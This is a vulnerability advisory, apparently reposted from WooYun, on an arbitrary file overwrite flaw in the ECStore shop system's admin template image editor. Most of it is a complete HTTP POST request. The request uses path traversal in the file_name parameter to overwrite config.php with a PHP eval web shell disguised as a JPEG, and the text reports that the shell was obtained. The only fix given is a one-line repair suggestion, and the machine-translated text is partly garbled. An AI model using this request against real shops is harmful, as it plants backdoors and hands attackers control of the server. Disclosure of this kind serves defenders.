ECStore open source online shop system arbitrary file modification vulnerability to get shell-vulnerability warning-the black bar safety net

2015-03-03T00:00:00
ID MYHACK58:62201559567
Type myhack58
Reporter Asuimu@乌云
Modified 2015-03-03T00:00:00

Description

Brief description:

Template Edit in the file edit function, to edit the file limit is not strict, the result may be to modify the system in the presence of any file

Detailed description:

File editing function, select To modify the file, where the selected image template file, then upload the picture when the file_name parameter is set to a site of any php file, 如/index.php或/config/config.php, the image content settings for the shell content。。。。

!

post data is as follows: POST /index. php/shopadmin/index. php? app=site&ctl=admin_explorer_theme&act=save_image HTTP/1.1 Host: shop.xxx.com Content-Length: 8 4 6 5 2 7 Cache-Control: max-age=0 Accept-Encoding: gzip,deflate Accept-Language: EN-us,EN;q=0.8,en;q=0.6 Cookie: xxxxxxxxx ------ WebKitFormBoundaryHSNjVhgvrpnTmmqd Content-Disposition: form-data; name="theme" ecstore ------ WebKitFormBoundaryHSNjVhgvrpnTmmqd Content-Disposition: form-data; name="open_path" ------ WebKitFormBoundaryHSNjVhgvrpnTmmqd Content-Disposition: form-data; name="file_name" ../../config/config.php ------ WebKitFormBoundaryHSNjVhgvrpnTmmqd Content-Disposition: form-data; name="upfile"; filename="Desert.jpg" Content-Type: image/jpeg <? php @eval($_POST['chopper']);?& gt; ------ WebKitFormBoundaryHSNjVhgvrpnTmmqd Content-Disposition: form-data; name="has_bak" 1 ------ WebKitFormBoundaryHSNjVhgvrpnTmmqd--

!

Similarly, when editing an html or xml file, there is also the problem

!

Vulnerability proof:

Successful connection to the webshell

!

the shell is got, the config file is modified, but the site hung up。。。。。

Repair solutions:

Limit the file_name parameter values, and do not let it modify the template directory of the file